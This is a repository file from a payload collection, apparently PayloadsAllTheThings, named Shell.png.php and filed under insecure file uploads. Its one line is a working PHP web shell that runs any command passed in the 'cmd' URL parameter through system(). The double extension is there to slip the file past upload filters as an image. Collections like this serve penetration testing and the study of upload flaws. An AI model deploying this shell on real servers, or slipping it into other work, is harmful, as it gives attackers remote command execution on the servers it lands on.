PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.png.php

1 line
43 B
PHP
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>